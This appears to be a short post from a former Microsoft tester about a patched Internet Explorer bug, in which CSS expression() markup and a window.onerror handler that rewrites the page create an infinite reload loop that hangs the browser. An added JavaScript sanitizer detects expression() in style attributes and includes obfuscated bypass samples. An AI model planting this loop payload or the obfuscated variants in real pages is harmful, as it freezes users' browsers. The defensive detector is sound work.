A CSS expression that throws a JavaScript error, combined with an onerror handler that writes a page reload script, creates an infinite loop that hangs the browser.
<a style="color: expression(if (!window.a) (window.b=123));" href="http://www.bing.com">Bing</a>
<script>
window.onerror = function() {
  document.write("<script>location.search = '?RND=' + Math.random()<\/script>");
  document.close();
  return true;
};
</script>
The CSS expression fires an error on evaluation, the onerror handler rewrites the page with a location change, the new page loads the same markup, and the cycle repeats indefinitely. Tested in IE8 emulation mode on IE10 / IE11 build 20130312-2100.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.
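A defensive check for the trigger above, added here as an example and not part of the original post: it flags inline style values that contain a CSS expression() call, so a sanitizer can reject them before markup reaches a legacy IE rendering mode. The function names and the sample inputs other than the post's own anchor tag are constructed, and the regex-based attribute extraction assumes a flagging pass rather than a full HTML parser.

```javascript
// Decode numeric HTML character references (&#101; / &#x65;); the browser
// decodes attribute values before the CSS parser sees them.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, n) => {
    const cp = n[0].toLowerCase() === "x" ? parseInt(n.slice(1), 16) : parseInt(n, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// Decode CSS backslash escapes: \78 (hex, optional trailing space) or a literal such as \(.
function decodeCssEscapes(css) {
  return css.replace(/\\([0-9a-f]{1,6})[ \t\r\n\f]?|\\([^\r\n\f0-9a-f])/gi, (m, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

const stripComments = (css) => css.replace(/\/\*[\s\S]*?\*\//g, "");

// True when a style value, after normalisation, contains an expression( call.
function hasCssExpression(styleValue) {
  let css = decodeNumericEntities(styleValue);
  css = stripComments(decodeCssEscapes(stripComments(css)));
  css = css.normalize("NFKC").toLowerCase(); // conservative: also folds fullwidth letters
  return /expression\s*\(/.test(css);
}

// Return the raw style attribute values in `html` that should be rejected.
function findExpressionStyles(html) {
  const attr = /\bstyle\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const hits = [];
  for (const m of html.matchAll(attr)) {
    const value = m[1] ?? m[2] ?? m[3];
    if (hasCssExpression(value)) hits.push(value);
  }
  return hits;
}

// Sample markup: the first entry is the anchor tag from the post, the rest are constructed.
const SAMPLES = [
  '<a style="color: expression(if (!window.a) (window.b=123));" href="http://www.bing.com">Bing</a>',
  "<div style='width: expr/**/ession(1)'>x</div>",
  '<div style="width: e\\78pression(1)">x</div>',
  '<p style="color: red">plain</p>',
];
for (const s of SAMPLES) console.log(findExpressionStyles(s).length ? "REJECT" : "ok    ", s);
```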